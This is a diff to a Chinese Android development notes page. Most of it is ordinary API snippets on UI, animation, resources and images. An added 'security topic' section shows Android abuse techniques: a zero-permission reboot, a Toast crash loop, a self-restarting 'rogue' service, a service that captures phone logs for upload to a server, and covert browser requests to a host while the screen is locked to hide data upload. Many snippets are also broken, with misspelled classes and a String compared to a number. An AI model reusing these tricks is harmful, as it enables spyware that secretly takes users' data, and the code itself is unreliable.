--- a/pages/development/android.textile
+++ b/pages/development/android.textile
@@ -7,98 +7,73 @@ title: Android
 
 h3. Android
 
-* "四大组件":#1
-* "控件":#2
-* "动画":#3
-** "Tween Animation":#301
-** "Frame Animation":#302
-* "Threads线程":#4
-** "AsyncTask异步任务":#41
-* "常用":#5
-** "获取当前系统版本号":#501
-** "横屏显示":#502
-** "全屏无标题栏显示":#503
-** "无标题栏显示":#504
-** "自定义标题栏布局":#505
-** "自定义标题栏背景":#506
-** "ListView滚动加载":#507
-** "异常处理":#508
-* "优化":#6
-** "ListView优化":#601
-** "图片缓存":#602
-* "网络编程":#7
-* "资源":#8
-** "drawble":#801
-** "values":#802
-** "raw":#803
-** "assets":#804
-
 </div>
 
 h1. Android
 
-h3(#1). Android四大组件
+h3(#1). Android四大组件 %(title)四大组件%
 <hr />
 
-*(#activity) *Activity*
+*(1#101) *Activity* %(title)Activity%
 ** "Activity生命周期":http://www.linguofeng.com/2011/09/special-edition-_activity-android-life-cycle.html
 ** "PreferenceActivity的使用":android/PreferenceActivity.html
 
-*(#service) *Service* - 服务
-** "startService":http://www.linguofeng.com
-** "bindService":http://blog.greensock.com
+*(1#102) *Service* - 服务 %(title)服务%
+** "startService":android/startService.html
+** "bindService":android/bindService.html
 ** "AIDL":android/AIDL.html - Android Interface Definition Language(接口描述语言，用于进程通信)
+** "IntentService":android/IntentService.html - 异步服务，方便处理耗时任务
 
-*(#broadcastreceiver) *BroadcastReceiver* - 广播接收者
+*(1#103) *BroadcastReceiver* - 广播接收者 %(title)广播接收者%
 
-*(#contentprovider) *ContentProvider* - 内容提供者
+*(1#104) *ContentProvider* - 内容提供者 %(title)内容提供者%
 
-h3(#2). Android UI控件
+h3(#2). Android UI控件 %(title)UI控件%
 <hr />
 
 * "TextView":java.html - 文本
 * "Menus":android/menu.html - 菜单（Options Menu、Context Menu、Submenu）
 * "Dialogs":android/dialog.html - 对话框（AlertDialog、ProgressDialog、DatePickerDialog、TimePickerDialog）
 * "Notifications":android/Notifications.html - 通知（Toast Notification、Status Bar Notification、Dialog Notification）
-* "ViewPager":android/ViewPager.html - *视图切换
+* "ViewFlipper":android/ViewFlipper.html - 视图切换
 * "Custom Components":http://www.linguofeng.com - 自定义控件
 
-h3(#3). Android动画
+h3(#3). Android动画 %(title)动画%
 <hr />
 
-*(#301) *Tween Animation*
+*(3#301) *Tween Animation* %(title)Tween%
 ** "平移":android/TranslateAnimation.html - TranslateAnimation
 ** "渐变":android/AlphaAnimation.html - AlphaAnimation
 ** "缩放":android/ScaleAnimation.html - ScaleAnimation
 ** "旋转":android/RotateAnimation.html - RotateAnimation
 
-*(#302) *Frame Animation*
+*(3#302) *Frame Animation* %(title)Frame%
 ** "逐帧动画":android/AnimationDrawable.html - AnimationDrawable
 
-h3(#4). Threads线程
+h3(#4). Threads线程 %(title)线程%
 <hr />
 
-*(#41) "AsyncTask 异步任务":android/AsyncTask.html
+*(4#41) "AsyncTask 异步任务":android/AsyncTask.html %(title)AsyncTask%
 
-h3(#5). 常用
+h3(#5). 常用 %(title)常用%
 <hr />
 
-*(#501) *获取当前系统版本号*
+*(5#501) *获取当前系统版本号* %(title)获取系统版本%
 <hr />
 
 pre. android.os.Build.VERSION.SDK_INT
 
-*(#502) *横屏显示*
+*(5#502) *横屏显示* %(title)横屏显示%
 <hr />
 
 pre. <activity android:screenOrientation="landscape"
 
-*(#503) *全屏无标题栏显示*
+*(5#503) *全屏无标题栏显示* %(title)全屏无标题栏显示%
 <hr />
 
 pre. <application android:theme="@android:style/Theme.Black.NoTitleBar.Fullscreen"
 
-*(#504) *无标题栏显示*
+*(5#504) *无标题栏显示* %(title)无标题栏显示%
 <hr />
 
 <pre class="brush: xml">
@@ -111,7 +86,7 @@ pre. <application android:theme="@android:style/Theme.Black.NoTitleBar.Fullscree
 requestWindowFeature(Window.FEATURE_NO_TITLE);
 </pre>
 
-*(#505) *自定义标题栏布局*
+*(#505) *自定义标题栏布局* %(title)%
 <hr />
 
 <pre class="brush: java;">
@@ -161,7 +136,7 @@ getWindow().setFeatureInt(Window.FEATURE_CUSTOM_TITLE, R.layout.main_title);
 </RelativeLayout>
 </pre>
 
-*(#506) *自定义标题栏背景与高度* (上面只是自定义标题栏的而已，而背景与高度还是没有变化，接下来就要处理标题栏背景与高度)
+*(5#506) *自定义标题栏背景与高度* (上面只是自定义标题栏的而已，而背景与高度还是没有变化，接下来就要处理标题栏背景与高度) %(title)自定义标题栏%
 <hr />
 
 <pre class="brush: xml">
@@ -181,7 +156,7 @@ getWindow().setFeatureInt(Window.FEATURE_CUSTOM_TITLE, R.layout.main_title);
 <activity android:name=".MainActivity" android:theme="@style/title" />
 </pre>
 
-*(#507) *ListView滚动加载更新数据*
+*(5#507) *ListView滚动加载更新数据* %(title)ListView滚动更新%
 <hr />
 
 <pre class="brush: java">
@@ -202,7 +177,7 @@ ListView.setOnScrollListener(new OnScrollListener() {
 });
 </pre>
 
-*(#508) *异常处理* (提示用户把异常信息回馈给公司)
+*(5#508) *异常处理* (提示用户把异常信息回馈给公司) %(title)异常处理%
 <hr />
 
 <pre class="brush: java">
@@ -270,7 +245,7 @@ public class App extends Application {
 }
 </pre>
 
-*(#509) *在子线程中使用主线程的消息队列*
+*(5#509) *在子线程中使用主线程的消息队列* %(title)子线程消息%
 <hr />
 
 <pre class="brush: java;">
@@ -282,7 +257,7 @@ Toase.makeText(this, "我是在子线程中利用Looper消息队列实现显示"
 Looper.loop();
 </pre>
 
-*(#510) *获取应用版本号并在线更新应用*
+*(5#510) *获取应用版本号并在线更新应用* %(title)在线更新应用%
 <hr />
 
 <pre class="brush: java">
@@ -291,10 +266,103 @@ PackageInfo pi = Context.getPackageManager().getPackageInfo(Context.getPackageNa
 pi.versionName;
 </pre>
 
-h3(#6). 优化
+*(5#511) *杀死后台进程* %(title)杀死后台进程%
 <hr />
 
-*(#601) *ListView优化*
+<pre class="brush: java">
+// 如果系统版本小于2.2的话
+if (android.os.Build.VERSION.SDK_INT < 8) {  
+    actMag.restartPackage("packageName");  
+} else {  
+    actMag.killBackgroundProcesses("packageName");  
+} 
+</pre>
+
+*(5#513) *发短信/彩信* %(title)发短信%
+<hr />
+
+<pre class="brush: java">
+// 标准
+SmsManager smsManager = SmsManager.getDefault();
+String message = "短信内容，有可能超过70个字符";
+PendingIntent sentIntent = PendingIntent.getBroadcast(getApplicationContext(), 0, new Intent(), 0);
+
+if (message > 70) {
+    // 截断70字一条
+    List<String> msgs = smsManager.divideMessage(message);
+    for (String msg : msgs) {
+        smsManager.sendTextMessage("对方电话号码", null, msg, sentIntent, null);
+    }
+} else {
+    smsManager.sendTextMessage("对方电话号码", null, message, sentIntent, null);
+}
+</pre>
+
+*(5#514) *Intent用法全面总结* %(title)常用Intent%
+<hr />
+** "Intent用法全面总结":android/Intent.html
+
+*(5#515) *判断sdcard是否存在* %(title)sdcard是否存在%
+<hr />
+
+<pre class="brush: java">
+public boolean isSdCardExists() { 
+    if (Environment.getExternalStorageState().equals(Environment.MEDIA_MOUNTED)) { 
+        return true; 
+    } else { 
+        return false; 
+    }
+}
+</pre>
+
+*(5#516) *判断某个服务是否正在运行* %(title)服务是否正在运行%
+<hr />
+
+<pre class="brush: java">
+public boolean isServiceRunning(String serviceName) { 
+    ActivityManager manager = (ActivityManager) ctx.getSystemService(Context.ACTIVITY_SERVICE); 
+    for (RunningServiceInfo svc : manager.getRunningServices(Integer.MAX_VALUE)) { 
+        if (svc.service.getClassName().equals(serviceName)) { 
+            return true; 
+        } 
+    }
+    return false; 
+}
+</pre>
+
+*(5#517) *获取已安装的软件信息* %(title)获取已安装软件信息%
+<hr />
+
+<pre class="brush: java">
+public List<HashMap<String, Object>> getInstalledApps() { 
+    List<ApplicationInfo> pkgs = ctx.getPackageManager().getInstalledApplications(0); 
+    
+    HashMap<String, Object> map; 
+    List<HashMap<String, Object>> list = new ArrayList<HashMap<String, Object>>(); 
+    
+    Iterator<ApplicationInfo> i = pkgs.iterator(); 
+    while (i.hasNext()) { 
+        ApplicationInfo app = i.next(); 
+        String pkgName = app.packageName; 
+        String label = ""; 
+        try { 
+            label = ctx.getPackageManager().getApplicationLabel(app).toString(); 
+        } catch (Exception e) { 
+            Log.e(tag, "setLabel is error. " + e.getMessage()); 
+        } 
+        map = new HashMap<String, Object>(); 
+        map.put("name", label); 
+        map.put("desc", pkgName); 
+        list.add(map);
+    }
+    return list; 
+}
+</pre>
+
+h3(#6). 优化 %(title)优化%
+<hr />
+
+*(6#601) *ListView优化* %(title)ListView优化%
 <hr />
 
 <pre class="brush: java;">
@@ -313,7 +381,7 @@ public View getView(...){
 }
 </pre>
 
-*(#602) *图片缓存* 软引用办法实现缓存
+*(6#602) *图片缓存* 软引用办法实现缓存 %(title)图片缓存%
 <hr />
 
 <pre class="brush: java">
@@ -329,7 +397,7 @@ if (imageCache.containsKey(imageUrl)) {
 imageCache.put(imageUrl, new SoftReference<Drawable>(bitmap));
 </pre>
 
-h3(#7). 网络编程
+h3(#7). 网络编程 %(title)网络编程%
 <hr />
 
 * *URL* & *URLConnection* （常用于下载文件）
@@ -348,10 +416,11 @@ h3(#7). 网络编程
 
 * *Socket* （TCP & UDP）
 
-h3(#8). 资源
+h3(#8). 资源 %(title)资源%
 <hr />
 
-*(#801) *drawable*
+*(8#801) *drawable* %(title)drawable%
+<hr>
 
 <pre class="brush: xml">
 <!-- XML中使用该类型资源 -->
@@ -363,7 +432,8 @@ h3(#8). 资源
 Drawable icon = getResources().getDrawable(R.drawable.icon);
 </pre>
 
-*(#802) *values*
+*(8#802) *values* %(title)values%
+<hr>
 
 <pre class="brush: xml">
 <!-- XML中使用该类型资源 -->
@@ -383,15 +453,354 @@ String[] texts = getResources().getStringArray(R.array.texts);
 int color = getResources().getColor(R.color.black);
 </pre>
 
-*(#803) *raw*
+*(8#803) *raw* %(title)raw%
+<hr>
 
 <pre class="brush: java">
 InputStream in = getResources().openRawResource(R.raw.test);
 </pre>
 
-*(#804) *assets*
+*(8#804) *assets* %(title)assets%
+<hr>
 
 <pre class="brush: java">
 AssetManager assetManager = getResources().getAssets();
 InputStream is = assetManager.open("文件名", MODE_APPEND);
+</pre>
+
+h3(#9). 安全专题 %(title)安全专题%
+<hr>
+
+* *基本介绍*
+<hr />
+** *AndroidManifest.xml*
+<hr>
+*** 作用1：声明包名且唯一
+*** 作用2：声明程序的组件
+*** 作用3：声明程序的权限
+** *Activity*
+<hr>
+*** 作用1：与用户交互的界面
+*** 作用2：一个View容器
+*** 作用3：受ActivityManager管理，维护Activity的task栈
+*** 作用4：启动的4种模式
+*** 作用5：可以被另的应用程序启动
+*** 作用6：运行在当前程序的进程中
+*** 作用7：可以添加权限
+** *Intent* （意图）
+<hr>
+*** 作用1：描述一个操作
+*** 作用2：简单IPC的实现（进程间通信）
+*** 作用3：传递数据
+*** 作用4：激活3大组件（Activity，Service，Broadcast）
+** *Broadcast Receiver* （广播）
+<hr>
+*** 作用1：接受广播的intent
+*** 作用2：在清单文件中注册
+*** 作用3：无序广播（异步），不可被终止
+*** 作用4：有序广播（同步），可以被终止
+** *Service*  （服务）
+<hr />
+*** 作用1：后台运行的组件
+*** 作用2： 默认不在单独进程中
+*** 作用3：运行在主线程中
+*** 作用4：没有界面的Activity
+
+* *沙箱机制*
+<hr />
+
+<pre>
+就是签名与权限的验证机制，只要遵守这个机制就可以超越一些安全防锁，但很麻烦
+</pre>
+
+* *0权限重启手机*
+<hr />
+
+<pre class="brush: java">
+// 0权限重启手机
+Intent intent = new Intent(Intent.ACTION_REBOOT);
+// 重启等待时间
+intent.putExtra("nowait", 1);
+// 重启的次数
+intent.putExtra("interval", 1);
+intent.putExtra("window", 0);
+sendBroadcast(intent);
+
+// 提升应用为系统程序（需要签名与系统签名一致，用到signapk.jar工具）
+<manifest ...
+    android:sharedUserId="android.uid.system"
+    
+// java -jar signapk.jar platform.x509.pem platform.pk8 原.apk 后.apk
+</pre>
+
+<pre class="brush: java">
+// 0权限重启手机（JNI版：Toast底层就是使用JNI）
+while(true){
+    Toast toast = new Toast(this);
+    // 不显示Toast的内容
+    toast.setView(new View(this)); 
+    toast.show();
+}
+</pre>
+
+* *0权限开机启动* （Android系统漏洞）
+<hr />
+
+<pre class="brush: xml">
+<!-- BootCompleteReceiver需要继承BroadcastReceiver -->
+<receiver android:name=".BootCompleteReceiver">
+    <intent-filter>
+        <action android:name="android.intent.action.BOOT_COMPLETED" />
+    </intent-filter>
+</receiver>
+
+<!-- 权限可以不添加 -->
+<!-- uses-permission / -->
+</pre>
+
+<pre class="brush: java">
+public class BootCompleteReceiver extends BroadcastReceiver {
+    public void onReceive(Context context, Intent intent) {
+        
+    }
+}
+</pre>
+
+* *流氓服务* （不死的服务）
+<hr />
+
+<pre>
+原理：在服务1被结束时启动服务2，在服务2结束时启动服务1，如此交替。
+</pre>
+
+* *隐私* （Logcat大法：adb logcat -b xxx）
+<hr />
+** Main     /dev/log/main
+** Events   /dev/log/events
+** Radio    /dev/log/radio
+** System   /dev/log/system
+
+* *Logcat实操* 目的：通过服务获取手机的所有日志并上传到服务器
+<hr />
+
+<pre class="brush: java">
+public class ReadLogService extends Service {
+
+    public IBinder onBind(Intext intext) {
+        return null;
+    }
+    
+    public void onStart(Intent intent, int startId) {
+        super.onStart(intent, startId);
+        // 开启线程读取日志（需要相关READ_LOGS权限）
+        new Thread(new ReadLogTask()).start();
+    }
+    
+    private class ReadLogTask implements Runnable {
+        public void run() {
+            // logcat -b main
+            // logcat -b events     操作相关的日志
+            // logcat -b radio      通话相关的日志
+            // logcat -b system
+            Process process = Runtime.getRunntime().exec("logcat -b radio");
+            InputStream is = process.getInputStream();
+            ByfferedReader br = new BufferedRead(new InputStreamReader(is));
+            
+            // TODO 把br流写到一个文件里或上传到服务器
+        }
+    }
+}
+</pre>
+
+* *0权限访问网络* （上传）
+<hr />
+
+<pre class="brush: java">
+public class ViewWebService extends Service {
+    ScreenOFFBroadcastReceiver off;
+    ScreenONBroadcastReceiver on;
+    KeyGuardManager mKeyGuardManager;
+
+    public IBinder onBind(Intext intext) {
+        return null;
+    }
+    
+    // 监听锁屏广播
+    class ScreenOFFBroadcastReceiver extends BroadcastReceiver {
+        public void onReceive(Context context, Intent intent) {
+            // TODO 上传数据
+            handler.postDelayed(r, 500);
+        }
+    }
+    
+    // 监听开屏广播
+    class ScreenONBroadcastReceiver extends BroadcastReceiver {
+        public void onReceive(Context context, Intent intent) {
+            // TODO 停止上传
+            handler.removeCallbacks(r);
+            
+            // 模拟HOME键退出浏览器（需要借助一个Activity实现）
+            // dispatchKeyEvent(new KeyEvent(KeyEvent.ACTION_DOWN, KeyEvent.ACTION_HOME));
+            Intent intent = new Intent();
+            intent.addAction(Intent.ACTION_VIEW);
+            intent.addCategory(Intent.CATEGORY_HOME);
+            startActivity(intent);
+        }
+    }
+    
+    public void onCreate() {
+        super.onCreate();
+        
+        //
+        mKeyGuardManager = (KeyGuardManager)getSystemService(KEYGUARD_SERVICE);
+        
+        off = new ScreenOFFBroadcastReceiver();
+        on = new ScreenONBroadcastReceiver();
+        
+        // 注册锁屏广播
+        IntentFilter ifOFF = new IntentFilter(android.intent.action.SCREEN_OFF);
+        registerReceiver(off, ifOFF);
+
+        // 注册开屏广播
+        IntentFilter ifON = new IntentFilter(android.intent.action.SCREEN_ON);
+        registerReceiver(on, ifON);
+    }
+    
+    Handler handler = new Handler();
+    
+    private Runnable r = new Runnable() {
+        public void run() {
+            // 锁屏状态
+            if(mKeyGuardManager.inKeyguardRestrictedInputMode()) {
+                Intent intent = new Intent(Intent.ACTION_VIEW);
+                intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+                intent.setData(Uri.parse("http://10.0.2.2/test.action?name=android"));
+                startActivity(intent);
+
+                // 重复发送
+                handler.postDelayed(r, 500);
+            }
+        }
+    };
+}
+</pre>
+
+h3(#10). 多媒体 %(title)多媒体%
+<hr />
+
+*(10#1001) *从相册中获取图片* %(title)获取图片%
+<hr />
+
+<pre class="brush: java">
+// 打开相册的意图
+Intent intent = new Intent(Intent.ACTION_PICK);
+intent.setType("image/*");
+startActivityForResult(intent, 0);
+
+public void onActivityResult(...) {
+    Uri uri = data.getData();
+    BitmapFactory.Options bfo = new BitmapFactory.Options();
+    bfo.inSampleSize = 8;
+    InputStream is = getContentResoler().openInputStream(uri);
+    Bitmap bitmap = BitmapFactory.decodeFile(is, bfo);
+}
+</pre>
+
+*(10#1002) *从相册中获取图片并按屏幕大小比例缩放显示* %(title)比例缩放%
+<hr />
+
+<pre class="brush: java">
+// 获取屏幕宽高
+Display display = getWindowManager().getDefaultDisplay();
+display.getWidth();
+display.getHeight();
+
+BitmapFactory.Options bfo = new BitmapFactory.Options();
+bfo.inJustDecodeBounds = true;
+BitmapFactory.decodeFile("图片路径", bfo);
+Math.deil(bfo.outHeight / display.getHeight());
+Math.deil(bfo.outWidth / display.getWidth());
+</pre>
+
+*(10#1003) *获取图片Exif信息* %(title)Exif信息%
+<hr />
+
+<pre class="brush: java">
+ExifInterface exif = ExifInterface("图片路径");
+// 获取
+exif.getAttribute(ExifInterface.对应的常量);
+// 设置
+exif.setAttribute(ExifInterface.对应的常量, "值");
+</pre>
+
+*(10#1004) *创建Bitmap拷贝* %(title)Bitmap拷贝%
+<hr />
+
+<pre class="brush: java">
+// 原图
+Bitmap source = BitmapFactory...
+//创建空白的Bitmap： 宽、高、原图的配置属性
+Bitmap bitmap = Bitmap.createBitmap(width, height, source.getConfig());
+// 画布
+Canvas canvas = new Canvas(bitmap);
+// 画笔
+Paint paint = new Paint();
+// 举正
+Matrix matrix = new Matrix();
+// 把原图画到bitmap中
+canvas.drawBitmap(source, matrix, paint);
+// 拷贝
+Btimap bak = bitmap;
+</pre>
+
+*(10#1005) *图形缩放（Scale）、旋转（Rotate）、平移（Translate）* %(title)图形缩旋平%
+<hr />
+
+<pre>
+Matrix类的使用
+</pre>
+
+*(10#1006) *颜色处理* %(title)颜色处理%
+<hr />
+
+<pre class="brush: java">
+// ColorMatrix类的使用
+ColorMatrix.set(new float[]{
+    1,0,0,0,0
+    0,1,0,0,0
+    0,0,1,0,0
+    0,0,0,1,0
+    
+    // 计算公式
+    // 红：  1*128 + 0*128 + 0...
+    // 绿：  0*128 + 1*128 + 0...
+    // 蓝：  0*128 + 0*128 + 1...
+    // 透明：0*128 + 0*128 + 0...
+});
+</pre>
+
+*(10#1007) *图片合成* %(title)图片合成%
+<hr />
+
+<pre class="brush: java">
+// 混合模式PorterDuffXfermode
+Paint.setXfermode(new PorterDuffXfermode(android.graphics.PorterDuff.Mode.MULTIPLY));
+</pre>
+
+*(10#1008) *Path路径文字* 弧度 %(title)Path路径文字%
+<hr />
+
+<pre class="brush: java">
+// Path类与Canvas.drawTextOnPath()方法的使用
+
+// 模拟SD卡被装载的广播
+//new Intent(ACTION_MEDIA_MOUNTED, Uri.aprse("file:///"));
+</pre>
+
+*(10#1009) *人脸识别* 弧度 %(title)人脸识别%
+<hr />
+
+<pre class="brush: java">
+// 人脸识别
+// FaceDetector类的使用
 </pre>
